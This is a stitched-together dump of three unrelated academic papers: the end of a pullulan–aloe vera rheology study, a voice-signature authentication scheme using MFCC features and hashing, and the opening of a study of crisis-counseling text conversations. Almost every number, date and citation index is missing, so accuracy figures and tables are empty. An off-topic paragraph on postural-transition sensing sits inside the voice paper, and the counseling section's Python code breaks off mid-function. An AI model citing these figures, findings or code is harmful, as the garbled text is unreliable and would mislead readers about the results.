the objective of this research was to study the flow behavior of the mixture of pullulan and aloe vera. several samples of the mixture were tested. it is concluded that the % pullulan-aloe vera mixture can be pumped with only minor effects on its flow behavior. the rheological properties of the nanofiber solution electrospun with the phd syringe pump at kv and a distance of cm ( , times magnification) were characterized. the yield stress, a key parameter in production, is small: the mixture requires only a small force to flow. the viscosity decreases with increasing shear rate. the cross model gives good agreement with the measured data at a cross time constant of s. however, the elastic modulus does not change appreciably with increasing frequency.
in the future, more rheological tests will be studied to indicate better predications of the fluids behavior. international journal of advanced network, monitoring and controls volume , no. , references [ ] thorat, k. a review of the stability of aloe vera gel. research j topic and cosmetic sci. [ ] torres- giner, s. nanoencapsulation of aloe vera in synthetic and naturally occurring polymers by electrohydrodynamic processing of interest in food technology and bioactive packaging [ ] aloe vera incorporated bioimetic nanofibrous scaffold: a regenerative approach for skin tissue engineering, suganya, s. [ ] tarameshloo, m., nourouzian, m., zarein-dolab, s. aloe vera gel and thyroid hormone cream may improve wound healing in wistar rats [ ] pellicconi, m., molinari, g.p. lucini, l. stability of the main aloe fractions and aloe-based commercial products under different storage conditions. agrochimica, vol. lv-n , september . [ ] kuan-chen cheng, ali demirci, jeffrey m. catchmark, “pullulan: biosynthesis, production, and applications, applied microbiology and biotechnology, july . [ ] ram s.singhagaganpreet k.sainiajohn f.kennedy, “pullulan: microbial sources, production and applications”, carbohydrate polymers, volume , issue , september , pages - . [ ] shady, s, gaines, p. garhwal, r. leahy, c. ellis, e. et al. synthesis and characterization of pullulan-polycaprolactone core–shell nanospheres encapsulated with ciprofloxacin. j of biomed nanotech vol. , – , . [ ] j.k. park, t. khan other microbial polysaccharides: pullulan, scleroglucan, elsinan, levan, alternant, dextran., in handbook of hydrocolloids (second edition), . [ ] a bossart, s. shady, and d. kalyon, “electrospun pullulan based nanofibers for medical applications”, nd society for - abstracts.biomaterials.org [ ] burger,christian, et al. “nanofibrous materials and their applications”, doi: . /annurev.matsci. . . . [ ] dias, j r, et al. “advances in electrospun skin substitutes.” doi: . /j.pmatsci. . . . [ ] coats b.c. method of processing stabilized aloe vera gel obtained from the whole aloe vera leaf. , , . u.s. patent. oct . paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , a secure voice signature based lightweight authentication approach for remote access control oladayo olufemi olakanmi electrical and electronic engineering university of ibadan ibadan, nigeria e-mail: olakanmi.oladayo@ui.edu.ng aminat shodipo embedded systems and security research group university of ibadan ibadan, nigeria e-mail: olakanmi.oladayo@ui.edu.ng abstract—crypto-authentication schemes become unreliable whenever the private key is compromised, making them unfit for any system or network that requires high level of confidentiality. key compromise is inevitable due to the wider space of operability of key in most of the cryptography based authentication schemes. to improve the performance of any authentication system, there is need to narrow its key operability to the key owner, that is eliminating the influence of other parties in the key generation and operability. however, this is quite difficult especially for any network that is characterised with low computation and energy, and relied on the third party for key management. in this paper, we propose the adoption of mel-frequency cepstral coefficients (mfcc) based voice signature based authentication scheme with a taint of cryptography operation. 
the scheme extracts the user’s voice signature as the hash of the mfcc parameters of the voice and unique passcode which is used for the authentication. we used exclusive or to filter off remnant of noise from mfcc values without incurring extra hardware cost. the performance evaluation results show authentication accuracy of . % at low computation cost and communication overhead. keywords-mfcc, authentication, cryptosystem, coding, security, access control i. introduction the adoption of cryptography in security system has not only enhanced the integrity of data and confidentiality but obviously contribute to the acceptability of most of the new technologies. however, cryptography based security schemes may not proffer universal security solution to most systems or networks. this is due to the restrictive processing power and memory resources, wider key generation procedure and operability that characterised these class of cryptograph based security solutions. therefore, they may not be effective for some systems. besides, key distribution is another issue in cryptography based security solutions, although public-key infrastructure can be used to eliminate problems involved with key distribution, however it comes with a lot of overheads. therefore, it is very important to find ways to reduce the overheads yet not sacrificing other aspects of security. the major loophole of cryptography security solutions is key escrow. this is a cryptographic key exchange process in which a key is held in escrow, or stored, by a third party. the problem with this, is that a lost key or compromised by its original user(s) may be used to decrypt encrypted material. key escrow is proactive through key disclosure laws. that is, it anticipates the need for access to keys. however, it also introduces new risks like loss of keys and legal issues such as involuntary self-incrimination which are likened to security weakness. recently, attention has been shifted to the adoption of biometric solution to mitigate some of the security loopholes of cryptography solution. biometric based technique may limit key generation and operability only to the users. however, some biometric based techniques have shortcomings which hinder their adoptability in access control. for example, replication is one of the major vulnerabilities of finger print based authentication systems. a few methods for fingerprint replication such as the use of grease stains on the scanner and/or latent fingerprint, the use of live finger, which is forceful amputated from the owner. mfcc is one of the popular algorithms for extracting features of speech in voice recognition. it is common to normalise their values when adopted in speech recognition systems. efforts had been made to improve on its algorithm such as raising the log-mel- amplitudes to a suitable power before taking the dct so as to nullify the effect of additive noise [ ]. in this paper we used exclusive or (xor) to nullify the remnant additive noise in mfcc values and generates unique voice signature of the user in the authentication phase. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , ii. related work voice recognition system has become a sophisticate security tool and a technology with great potential in authentication systems. it is the only biometric based recognition system that processes acoustic information contrary to other forms of biometrics, such as fingerprint, dna, retina etc., that are image-based. 
each human has their unique characteristic in speech and voice that can be captured and analyzed. voice recognition system can be divided into two phases; identification and verification phases. voice identification is used to decide who an unknown voice belongs to amongst a set of known speakers while voice verification accepts or rejects the identity claim of a speaker. voice identification can also be sub-classified into text-dependent and text-independent identification. in text-dependent identification, the individual has to utter the same keyword both in the test and training phases. meanwhile, text-independent identification properly identifies the speaker regardless of what is being said. voice recognition system has a lot of applications, such as authentication in remote identification and verification, mobile banking, atm transactions, and online transactions and reservations; information security in device logon, and application and database security; law enforcement such as forensic investigation, and surveillance applications. several works had been done on voice recognition and its application to solve different access control problems. for example, sidiqs et al. [ ], proposed a speech recognition system to translate human speech to an action in machine. they used mfcc by splitting the input signal amplitudes into frames which are processed using the mel-filterbak. the results are made into a codebook which is used as an input symbol to form a model of every word. jagan and rameshin [ ] also developed a mfcc and dynamic time wrapping (dtw) based speech recognition system for feature extraction and pattern matching respectively. drisya and anish [ ] used bessel features as an alternative to mfcc and lpcc to develop a text-independent speaker identification system. the quasi-stationary nature of speech signal was represented by damped sinusoidal based function, and a bessel features derived from the speech signal was used to create gaussian mixture models for text independent speaker identification. meanwhile, work in [ ] introduced a new algorithm for extracting mfcc for speech recognition. the results showed that the new algorithm reduced the computation power and accuracy compared to the conventional algorithm. the ability to perform postural transitions such as sittostand is an accepted metric for functional independence. the number of transitions performed in real life situations provides useful clinical information for an individual recovering from lower extremity injury or surgery. consequent to this, sadra and eric [ ] proposed a new inertialsensor based approach to detect transitions using wavelet transform. their approach is robust for supervised laboratory and ambient settings. also, authors in [ ] developed a speaker recognition system using a statistical model like gaussian mixture model (gmm) to implement a recognizer. the features extracted from the speech signal were used to build a unique identity for each authorised user. estimation and maximization algorithms were used for finding the maximum likelihood solution for a model with latent variables. laryngeal diseases and vocal fold pathologies have strong impacts on the quality of the voice recognition system. in [ ] a user friendly approach was proposed to discriminate between normal and abnormal voice. the feature extraction technique was applied on the voice signal in the time domain and in the frequency domain. another work on voice recognition is speaker identification system proposed in [ ]. 
in the work, a speaker recognition system was implemented using a combination of mfcc and kekre’s median code book generation algorithm (kmcg). the mfcc algorithm was used for feature extraction while the kmcg algorithm plays important role in code book generation and feature matching. however, most of these works were directed to voice recognition systems. our work is directed to how the voice signature can be combined with cryptography operation to evolve an efficient access control scheme with narrow operability to mitigate key compromise. iii. voice signature based authentication scheme for access control the voice signature based authentication scheme involves two phases; registration and authentication phases. the registration phase takes voice samples and pass codes of all the authorised individuals, processed it in order to reduce the overall bulk and complexity, then extracts mfcc (mel-frequency cepstral coefficients) before generating the voice signature. this phase is sub-divided into six divisions; elimination of silent frame, framing, hamming windowing, mfcc generation, and voice signature generation. meanwhile, the verification phase regenerates the user’s voice signature and compare it with all the encrypted voice signature stored in the international journal of advanced network, monitoring and controls volume , no. , memory of the access point’s memory using the k- means algorithm and correlation coefficient. figure . model of the remote voice based access control a. registration phase in the registration phase, voice samples are collected from a number of authorised users by the remote system. these voice samples are then pre- processed and their voice signature are obtained, encrypted and stored in the memory of the access control unit of the remote system. this stage consists of six sub-stages which are described below. to generate the voice signature all the stages must be executed in that order. ) elimination of silent frames it is pertinent to remove silent frames when processing speech in order to reduce the overall bulk and complexity of the speech signal. it is known that when humans are talking, it is very impossible not to have gaps or pauses in between words and sentences hence the importance of this phase. these gaps and pauses in the middle of speech increase the speech length or the number of frames to be processed, it therefore important to remove them. after proper studying of the spectrogram of speech, the amplitude for silent frames was pegged at . hence frames with amplitude less than . are removed. ) framing framing sub-stage divides the continuous speech signal into frames of b samples, with adjacent frames being separated by a where . first frame consists of first b samples. then, second frame begins with a samples after the first frame, and overlaps it by samples and so on. this continues until all the speech is accounted within one or more frames. typically, b and a are chosen as and respectively. figure shows a speech signal after it has been framed. figure . speech signal after undergoing framing ) hamming windowing after framing, hamming windowing, as shown in figure , is now used to tape the voice signal to zero at the beginning and the end, thereby reducing discontinuities in the signal. this helps to focus on the information at the centre of the frame as shown in figure . for example, if the window is defined as and the speech signal as then the resultant signal after windowing is the signal defined as: . 
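the registration stages just listed (silent-frame removal and framing, followed by the windowing, fft, mfcc, and signature-generation steps detailed in the subsections that follow) can be strung together as in the sketch below. the silence threshold, frame sizes, filter-bank size, quantisation step, and hash function (sha-256) are all assumptions made for illustration, and the final encryption of the stored signature is omitted; python with numpy is assumed.

```python
# illustrative sketch only: silent-frame removal, framing, hamming windowing,
# |fft|, a simplified mel filter bank, dct, and xor/hash signature generation.
# the numeric choices below (threshold, frame sizes, 26 filters, 13 kept
# coefficients, x100 quantisation, sha-256) are assumptions, not values taken
# from the paper.
import hashlib
import numpy as np

SR = 8000                   # assumed sampling rate (Hz)
SILENCE_THRESHOLD = 0.025   # assumed amplitude threshold for silent frames
B, A = 256, 100             # assumed frame length and frame step (samples)

def remove_silence(signal):
    """drop B-sample blocks whose peak amplitude is below the threshold."""
    kept = [signal[i:i + B] for i in range(0, len(signal) - B + 1, B)
            if np.max(np.abs(signal[i:i + B])) >= SILENCE_THRESHOLD]
    return np.concatenate(kept) if kept else np.empty(0)

def make_frames(signal):
    """overlapping frames of B samples taken every A samples."""
    return np.stack([signal[s:s + B] for s in range(0, len(signal) - B + 1, A)])

def mfcc_from_frame(frame, n_filters=26, n_coeffs=13):
    """hamming window -> |fft| -> mel-spaced bands -> log -> dct (c0 dropped)."""
    n = len(frame)
    window = 0.54 - 0.46 * np.cos(2 * np.pi * np.arange(n) / (n - 1))
    spectrum = np.abs(np.fft.rfft(frame * window))
    mel = lambda f: 2595 * np.log10(1 + f / 700)
    mel_inv = lambda m: 700 * (10 ** (m / 2595) - 1)
    edges = mel_inv(np.linspace(mel(0), mel(SR / 2), n_filters + 2))
    bins = np.floor((n // 2) * edges / (SR / 2)).astype(int)
    # rectangular mel-spaced bands: a crude stand-in for triangular filters
    energies = np.array([spectrum[bins[i]:bins[i + 2] + 1].sum() + 1e-12
                         for i in range(n_filters)])
    idx_n = np.arange(1, n_coeffs + 1)[:, None]
    idx_k = np.arange(n_filters)[None, :]
    dct = np.cos(np.pi * idx_n * (idx_k + 0.5) / n_filters)
    return dct @ np.log(energies)

def voice_signature(raw_signal, passcode):
    """xor the quantised max/min mfcc vectors, then hash them with the passcode."""
    frames = make_frames(remove_silence(raw_signal))
    coeffs = np.array([mfcc_from_frame(f) for f in frames])
    q_max = np.round(coeffs.max(axis=0) * 100).astype(np.int64)   # assumed quantisation
    q_min = np.round(coeffs.min(axis=0) * 100).astype(np.int64)
    mixed = (q_max ^ q_min).tobytes()   # xor cancels additive noise common to both
    return hashlib.sha256(mixed + passcode.encode()).hexdigest()
```

at registration the resulting digest would be encrypted and stored by the access control unit; during authentication the same pipeline is re-run on the fresh voice sample and the digests are compared.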
in this work, we used a hamming window of the standard form w(n) = 0.54 − 0.46·cos(2πn/(N − 1)), 0 ≤ n ≤ N − 1, where N is the frame length.

figure . hamming window before applying it on speech signal
figure . speech signal after applying the hamming window

) fast fourier transform (fft)
the fft is then used to transform the speech signal from the time domain to the frequency domain in order to obtain the mfcc. the fft is a fast algorithm for computing the discrete fourier transform (dft), defined on a set of N samples as X_k = Σ_{n=0..N−1} x_n·e^{−j2πkn/N}, which gives the fast fourier transform of each frame. the X_k are in general complex numbers, and we only consider their absolute values (magnitudes), because considering the phase produces very skewed results, as shown in figures and .

figure . audio signal with magnitude and phase
figure . audio signal considering the magnitude only

) mel-frequency cepstral coefficient
out of all the feature extraction algorithms available, mfcc is commonly used because of the way it closely mimics the natural human auditory system. the mel-frequency scale is a linear frequency spacing below hz and a logarithmic spacing above hz. the usual approach to simulating this subjective spectrum is to use a filter bank spaced uniformly on the mel scale, applied to the spectrum of each frame. the mel spectrum coefficients are then converted back to the time domain using the discrete cosine transform (dct). the mfcc is calculated as c_n = Σ_{k=1..K} (log S_k)·cos[n(k − 1/2)π/K], 1 ≤ n ≤ K − 1, where S_k are the mel filter-bank outputs. the first component is excluded from the dct since it represents the mean value of the input signal and hence carries little speaker-specific information [ ].

figure . mel-filter bank

) voice signature generation
after obtaining the mfcc values, the access control unit selects the maximum and minimum values as the mfcc of the user, and calculates the user's voice signature as the encryption of the hash of this mfcc and the passcode of the user. that is, the voice signature is generated as vs = e(h((mfcc_max ⊕ mfcc_min) ∥ passcode)). the ⊕ operator acts as a noise filter, since the two values mfcc_max and mfcc_min include the same additive noise, which the xor operation cancels.

) authentication phase
to access the system, the scheme requests the user's voice signal through the mobile device in order to re-generate an access voice signature. it then compares the re-generated access voice signature with all the voice signatures in memory in order to authenticate the user.

iv. performance evaluation

a. experimental setup
one hundred and fifty-two tests using different users of mixed sex were used to test the efficiency of the voice-based authentication scheme. voice signatures of the five users ( females and males) saying the same sentence were extracted.

table i. performance evaluation of voice signature based authentication approach
trial    no. of samples    no. of false rejections    no. of false acceptances    % accuracy
user
user
user
user
user

each person's voice signature was matched against the rest of the voice signatures in the database. the accuracy of the system was determined in terms of false acceptances and false rejections. a false acceptance occurs when the system grants access to an unauthorised user, while a false rejection occurs when the system denies access to an authorised user. the scheme was simulated on a platform consisting of a mobile device (samsung galaxy s with a quad-core . ghz processor, gb ram, and google android . . operating system) and a pc with an intel(r) core(tm) i - u cpu @ .
ghz processor as the remote access control system. we determine the computation and communication costs of the scheme. b. result and discussion the results of the performance of the scheme in terms of false acceptance and rejection ratios are shown in table . it shows that the system is accurate with accuracy of . %. also, computation cost, in terms of the execution time by the scheme for points fft, is obtained as shown in figure . this shows that the computation cost increases as the number of users increases, and indicates that the scheme has low computation cost and can be easily adopted by any system that is characterised as computation and energy constraint system. also, figure shows the energy consumption of the scheme in terms of number of cycles required. this also indicates that the proposed scheme is energy-aware since energy consumed by a processor is approximately proportional to number of cycles or frequency , and to the square of the processor voltage v [ ]. meanwhile, the communication overhead incurred for every authentication is bits. this indicates that the scheme requires low bandwidth and there will never be congestion irrespective of the bandwidth of the communication channel. figure . computation cost (ms) figure . energy cost in terms of cycles v. conclusion in this work, we demonstrated how voice signature can be used to developed access control scheme for remote system. we solved the effect of the additive noise on mfcc using to eliminate the congruent additive noise embedded in the maximum mfcc and minimum mfcc values. the mfcc, hash function and conventional pass-code are used generate voice signature from user’s voice signal. this is used to solve the problem of wider operability of key in cryptography based references [ ] muslim sidiq, tjokorda agung budi w, siti saadah ( ). design and implementation of voice command using mfcc and hmms method. rd international conference on information and communication technology ( icoict ). [ ] drisya vasudev, anish babu ( ). speaker identification using fbcc in malayalam language. international conference on advances in computing, communications and informatics (icacci). international journal of advanced network, monitoring and controls volume , no. , [ ] jagan mohan and ramesh babu( ). speech recognition using mfcc and dtw. st int. conference on advances in electrical engineering, vit, vellore, india [ ] wei han, cheong-fat chan, chiu-sing choy, kong-pang pun ( ). an efficient mfcc extraction method in speech recognition. iscas, proceedings of ieee international symposium on circuits and systems. [ ] sadra hemmati, eric wade ( ). detecting postural transitions: a robust wavelet-based approach. proceeding of ieee th annual international conference of the engineering in medicine and biology society (embc), pp. - . [ ] s. g. bagul, r.k.shastri ( ). text independent speaker recognition system using gmm. international conference on human computer interactions (ichci), pp - . [ ] manal abdel wahed ( ). computer aided recognition of pathological voice. st national radio science conference (nrsc), pp. – . [ ] h b kekre, v a bharadi, a r sawant, onkar kadam, pushkar lanke, rohit lodhiya ( ). speaker recognition using vector quantization by mfcc and kmcg clustering algorithm. international conference on communication, information and computing technology ( iccict ). [ ] tyagi and c. wellekens ( ). on desensitizing the mel-cepstrum to spurious spectral components for robust speech recognition. 
in proceeding of ieee international conference on acoustics, speech and signal processing, vol. , pp. - . [ ] saqui z., salam n., nair n., pandey n. ( ) voiceprint recognition system for remote authentication survey. international journal of hybrid information technology, vol. , no. . [ ] sunil a., shruti a., rama c. ( ) prosodic feature based text dependent speaker recognition using machine learning algorithms. international journal of engineering science and technology, vol. no. , pp. - . [ ] kirti a., and minakshee p., ( ). speech and speaker identification for password verification system. international journal of advanced research in electrical,electronic and instrumentation, vol. , issue . [ ] parrul, r., dubey, b., ( ). automatic speaker recognition system. international journal of advanced computer research, vol. , no. . [ ] wikipedia. ( ). cpu power dissipation. (http://en.wikipedia.org/wiki/cpu-power-dissipation) large-scale analysis of counseling conversations: an application of natural language processing to mental health tim althoff∗, kevin clark∗, jure leskovec stanford university {althoff, kevclark, jure}@cs.stanford.edu abstract mental illness is one of the most pressing pub- lic health issues of our time. while counsel- ing and psychotherapy can be effective treat- ments, our knowledge about how to conduct successful counseling conversations has been limited due to lack of large-scale data with la- beled outcomes of the conversations. in this paper, we present a large-scale, quantitative study on the discourse of text-message-based counseling conversations. we develop a set of novel computational discourse analysis meth- ods to measure how various linguistic aspects of conversations are correlated with conver- sation outcomes. applying techniques such as sequence-based conversation models, lan- guage model comparisons, message cluster- ing, and psycholinguistics-inspired word fre- quency analyses, we discover actionable con- versation strategies that are associated with better conversation outcomes. introduction mental illness is a major global health issue. in the u.s. alone, . million adults ( . %) experience mental illness in a given year (national institute of mental health, ). in addition to the person di- rectly experiencing a mental illness, family, friends, and communities are also affected (insel, ). in many cases, mental health conditions can be treated effectively through psychotherapy and coun- seling (world health organization, ). however, it is far from obvious how to best conduct counsel- ing conversations. such conversations are free-form without strict rules, and involve many choices that *both authors contributed equally to the paper. could make a difference in someone’s life. thus far, quantitative evidence for effective conversation strategies has been scarce, since most studies on counseling have been limited to very small sample sizes and qualitative observations (e.g., labov and fanshel, ( ); haberstroh et al., ( )). how- ever, recent advances in technology-mediated coun- seling conducted online or through texting (haber- stroh et al., ) have allowed counseling ser- vices to scale with increasing demands and to col- lect large-scale data on counseling conversations and their outcomes. here we present the largest study on counseling conversation strategies published to date. 
we use data from an sms texting-based counseling service where people in crisis (depression, self-harm, sui- cidal thoughts, anxiety, etc.), engage in therapeutic conversations with counselors. the data contains millions of messages from eighty thousand counsel- ing conversations conducted by hundreds of coun- selors over the course of one year. we develop a set of computational methods suited for large-scale dis- course analysis to study how various linguistic as- pects of conversations are correlated with conversa- tion outcomes (collected via a follow-up survey). we focus our analyses on counselors instead of individual conversations because we are interested in general conversation strategies rather than prop- erties of specific issues. we find that there are sig- nificant, quantifiable differences between more suc- cessful and less successful counselors in how they conduct conversations. our findings suggest actionable strategies that are associated with successful counseling: . adaptability (section ): measuring the dis- tance between vector representations of the lan- guage used in conversations going well and go- ing badly, we find that successful counselors are more sensitive to the current trajectory of the conversation and react accordingly. . dealing with ambiguity (section ): we de- velop a clustering-based method to measure differences in how counselors respond to very similar ambiguous situations. we learn that successful counselors clarify situations by writ- ing more, reflect back to check understanding, and make their conversation partner feel more comfortable through affirmation. . creativity (section . ): we quantify the di- versity in counselor language by measuring cluster density in the space of counselor re- sponses and find that successful counselors re- spond in a more creative way, not copying the person in distress exactly and not using too generic or “templated” responses. . making progress (section ): we develop a novel sequence-based unsupervised conversa- tion model able to discover ordered conversa- tion stages common to all conversations. ana- lyzing the progression of stages, we determine that successful counselors are quicker to get to know the core issue and faster to move on to collaboratively solving the problem. . change in perspective (section ): we de- velop novel measures of perspective change us- ing psycholinguistics-inspired word frequency analysis. we find that people in distress are more likely to be more positive, think about the future, and consider others, when the coun- selors bring up these concepts. we further show that this perspective change is associated with better conversation outcomes consistent with psychological theories of depression. further, we demonstrate that counseling success on the level of individual conversations is predictable using features based on our discovered conversation strategies (section ). such predictive tools could be used to help counselors better progress through the conversation and could result in better counseling practices. the dataset used in this work has been re- leased publicly and more information on dataset ac- cess can be found at http://snap.stanford. edu/counseling. although we focus on crisis counseling in this work, our proposed methods more generally apply to other conversational settings and can be used to study how language in conversations relates to con- versation outcomes. related work our work relates to two lines of research: therapeutic discourse analysis & psycholinguis- tics. 
the field of conversation analysis was born in the s out of a suicide prevention center (sacks and jefferson, ; van dijk, ). since then conversation analysis has been applied to various clinical settings including psychotherapy (labov and fanshel, ). work in psycholinguistics has demonstrated that the words people use can re- veal important aspects of their social and psycho- logical worlds (pennebaker et al., ). previous work also found that there are linguistic cues as- sociated with depression (ramirez-esparza et al., ; campbell and pennebaker, ) as well as with suicude (pestian et al., ). these find- ings are consistent with beck’s cognitive model of depression ( ; cognitive symptoms of depres- sion precede the affective and mood symptoms) and with pyszczynski and greenberg’s self-focus model of depression ( ; depressed persons engage in higher levels of self-focus than non-depressed per- sons). in this work, we propose an operationalized psy- cholinguistic model of perspective change and fur- ther provide empirical evidence for these theoretical models of depression. large-scale computational linguistics applied to conversations. large-scale studies have re- vealed subtle dynamics in conversations such as co- ordination or style matching effects (niederhoffer and pennebaker, ; danescu-niculescu-mizil, ) as well as expressions of social power and status (bramsen et al., ; danescu-niculescu- mizil et al., ). other studies have connected writing to measures of success in the context of re- quests (althoff et al., ), user retention (althoff and leskovec, ), novels (ashok et al., ), and scientific abstracts (guerini et al., ). prior http://snap.stanford.edu/counseling http://snap.stanford.edu/counseling work has modeled dialogue acts in conversational speech based on linguistic cues and discourse coher- ence (stolcke et al., ). unsupervised machine learning models have also been used to model con- versations and segment them into speech acts, top- ical clusters, or stages. most approaches employ hidden markov model-like models (barzilay and lee, ; ritter et al., ; paul, ; yang et al., ) which are also used in this work to model progression through conversation stages. very recently, technology-mediated counseling has allowed the collection of large datasets on coun- seling. howes et al. ( ) find that symptom sever- ity can be predicted from transcript data with com- parable accuracy to face-to-face data but suggest that insights into style and dialogue structure are needed to predict measures of patient progress. counseling datasets have also been used to predict the conversa- tion outcome (huang, ) but without modeling the within-conversation dynamics that are studied in this work. other work has explored how novel inter- faces based on topic models can support counselors during conversations (dinakar et al., a; b; ; chen, ). our work joins these two lines of research by de- veloping computational discourse analysis methods applicable to large datasets that are grounded in ther- apeutic discourse analysis and psycholinguistics. dataset description in this work, we study anonymized counseling con- versations from a not-for-profit organization provid- ing free crisis intervention via sms messages. text- based counseling conversations are particularly well suited for conversation analysis because all interac- tions between the two dialogue partners are fully ob- served (i.e., there are no non-textual or non-verbal cues). 
moreover, the conversations are important, constrained to dialogue between two people, and outcomes can be clearly defined (i.e., we follow up with the conversation partner as to whether they feel better afterwards), which enables the study of how conversation features are associated with actual out- comes. counseling process. any person in distress can text the organization’s public number. incoming re- quests are put into a queue and an available coun- dataset statistics conversations , conversations with survey response , ( . %) messages . million messages with survey response , ( . %) counselors messages per conversation* . words per message* . table : basic dataset statistics. rows marked with * are computed over conversations with survey responses. selor picks the request from the queue and engages with the incoming conversation. we refer to the cri- sis counselor as the counselor and the person in dis- tress as the texter. after the conversation ends, the texter receives a follow-up question (“how are you feeling now? better, same, or worse?”) which we use as our conversation quality ground-truth (we use binary labels: good versus same/worse, since we care about improving the situation). in contrast to previous work that has used human judges to rate a caller’s crisis state (kalafat et al., ), we di- rectly obtain this feedback from the texter. further- more, the counselor fills out a post-conversation re- port (e.g., suicide risk, main issue such as depres- sion, relationship, self-harm, suicide, etc.). all crisis counselors receive extensive training and commit to weekly shifts for a full year. dataset statistics. our dataset contains coun- selors and . million messages in , conversa- tions between november and november (see table ). all system messages (e.g., instruc- tions), as well as texts that contain survey responses (revealing the ground-truth label for the conversa- tion) were filtered out. out of these conversations, we use the , , or . %, that contain a ground- truth label (whether the texter feels better or the same/worse after the conversation) for the follow- ing analyses. conversations span a variety of issues of different difficulties (see rows one and two of ta- ble ). approval to analyze the dataset was obtained from the stanford irb. defining counseling quality the primary goal of this paper is to study strategies that lead to conversations with positive outcomes. thus, we require a ground-truth notion of conver- sation quality. in principle, we could study individ- na depressed relationship self harm family suicide stress anxiety other success rate . . . . . . . . . frequency . . . . . . . . . frequency with more successful counselors . . . . . . . . . frequency with less successful counselors . . . . . . . . . table : frequencies and success rates for the nine most common conversation issues (na: not available). on average, more and less successful counselors face the same distribution of issues. ual conversations and aim to understand what fac- tors make the conversation partner (texter) feel bet- ter. however, it is advantageous to focus on the conversation actor (counselor) instead of individual conversations. there are several benefits of focusing analy- ses on counselors (rather than individual conversa- tions): first, we are interested in general conversa- tion strategies rather than properties of main issues (e.g., depression vs. suicide). 
while each conver- sation is different and will revolve around its main issue, we assume that counselors have a particular style and strategy that is invariant across conversa- tions. second, we assume that conversation qual- ity is noisy. even a very good counselor will face some hard conversations in which they do every- thing right but are still unable to make their conver- sation partner feel better. over time, however, the “true” quality of the counselor will become appar- ent. third, our goal is to understand successful con- versation strategies and to make use of these insights in counselor training. focusing on the counselor is helpful in understanding, monitoring, and improv- ing counselors’ conversation strategies. more vs. less successful counselors. we split the counselors into two groups and then compare their behavior. out of the counselors with more than labeled conversations of at least messages each, we use the most successful counselors as “more successful” counselors and the bottom as “less successful” counselors. their average success rates are . - . % and . - . %, respectively. while the counselor-level analysis is of primary con- cern, we will also differentiate between counselor behavior in “positive” versus “negative” conversa- tions (i.e., those that will eventually make the texter feel better vs. not). thus, in the remainder of the paper we differentiate between more vs. less suc- cessful counselors and positive vs. negative conver- - - - - - portion of conversation (% of messages) a ve ra ge m es sa ge le ng th more successful counselors, positive conversations more successful counselors, negative conversations less successful counselors, positive conversations less successful counselors, negative conversations figure : differences in counselor message length (in #tokens) over the course of the conversation are larger between more and less successful counselors (blue cir- cle/red square) than between positive and negative con- versations (solid/dashed). error bars in all plots corre- spond to bootstrapped % confidence intervals using the member bootstrapping technique from ren et al. ( ). sations. studying the cross product of counselors and conversations allows us to gain insights on how both groups behave in positive and negative conver- sations. for example, figure illustrates why differ- entiating between counselors and as well as conver- sations is necessary: differences in counselor mes- sage length over the course of the conversation are bigger between more and less successful counselors than between positive and negative conversations. initial analysis. before focusing on detailed anal- yses of counseling strategies we address two impor- tant questions: do counselors specialize in certain issues? and, do successful counselors appear suc- cessful only because they handle “easier” cases? to gain insights into the “specialization hypoth- esis” we make use the counselor annotation of the main issue (depression, self-harm, etc.). we com- pare success rates of counselors across different issues and find that successful counselors have a higher fraction of positive conversations across all issues and that less successful counselors typically do not excel at a particular issue. thus, we conclude that counseling quality is a general trait or skill and supporting that the split into more and less success- ful counselors is meaningful. 
another simple explanation of the differences be- tween more and less successful counselors could be that successful counselors simply pick “easy” issues. however, we find that this is not the case. in par- ticular, we find that both counselor groups are very similar in how they select conversations from the queue (picking the top-most in . % vs. . %, respectively), work similar shifts, and handle a sim- ilar number of conversations simultaneously ( . vs. . ). further, we find that both groups face sim- ilar distributions of issues over time (see table ). we attribute the largest difference, “na” (main issue not reported), to the more successful counselors be- ing more diligent in filling out the post-conversation report and having fewer conversations that end be- fore the main issue is introduced. counselor adaptability in the remainder of the paper we focus on factors that mediate the outcome of a conversation. first, we examine whether successful counselors are more aware that their current conversation is going well or badly and study how the counselor adapts to the situation. we investigate this question by looking for language differences between positive and neg- ative conversations. in particular, we compute a distance measure between the language counselors use in positive conversations and the language coun- selors use in negative conversations and observe how this distance changes over time. we capture the time dimension by breaking up each conversation into five even chunks of messages. then, for each set of counselors (more successful or less successful), conversation outcome (positive or negative), and chunk (first %, second %, etc.), we build a tf-idf vector of word occurrences to represent the language of counselors within this subset. we use the global inverse document (i.e., conversation) frequencies instead of the ones from each subset to make the vectors directly comparable and control for different counselors having differ- ent numbers of conversations by weighting conver- sations so all counselors have equal contributions. we then measure the difference between the “posi- - - - - - ortlon of conversdtlon (% of pessdges) . . . . . . . . d ls td nc e be tw ee n po sl tlv e d nd n eg dt lv e co nv er sd tlo ns ore successful counselors less successful counselors figure : more successful counselors are more varied in their language across positive/negative conversations, suggesting they adapt more. all differences between more successful and less successful counselors except for the - bucket were found to be statistically significant (p < . ; bootstrap resampling test). tive” and “negative” vector representations by taking the cosine distance in the induced vector space. we also explored using jensen-shannon divergence be- tween traditional probabilistic language models and found these methods gave similar results. results. we find more successful counselors are more sensitive to whether the conversation is going well or badly and vary their language accordingly (figure ). at the beginning of the conversation, the language between positive and negative conver- sations is quite similar, but then the distance in lan- guage increases over time. this increase in distance is much larger for more successful counselors than less successful ones, suggesting they are more aware of when conversations are going poorly and adapt their counseling more in an attempt to remedy the situation. 
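a minimal sketch of the adaptability measure just described: counselor language from positive and from negative conversations is turned into tf-idf vectors for each fifth of the conversation, using a single global idf, and the two vectors are compared with cosine distance. tokenisation is naive and the equal-contribution weighting per counselor is omitted, so this is only an outline of the computation, in python.

```python
# outline of the chunk-wise tf-idf comparison between positive and negative
# conversations; tokenisation and per-counselor weighting are simplified.
import math
from collections import Counter

def tfidf(counts, idf):
    return {w: c * idf[w] for w, c in counts.items() if w in idf}

def cosine_distance(u, v):
    dot = sum(u[w] * v.get(w, 0.0) for w in u)
    norm = math.sqrt(sum(x * x for x in u.values())) * math.sqrt(sum(x * x for x in v.values()))
    return 1.0 - dot / norm if norm else 1.0

def adaptability_curve(conversations, n_chunks=5):
    """conversations: list of (messages, is_positive), where messages is the
    ordered list of counselor messages (strings) in one conversation."""
    # global idf computed over whole conversations
    df = Counter()
    for messages, _ in conversations:
        df.update(set(" ".join(messages).lower().split()))
    n = len(conversations)
    idf = {w: math.log(n / d) for w, d in df.items()}

    distances = []
    for chunk in range(n_chunks):
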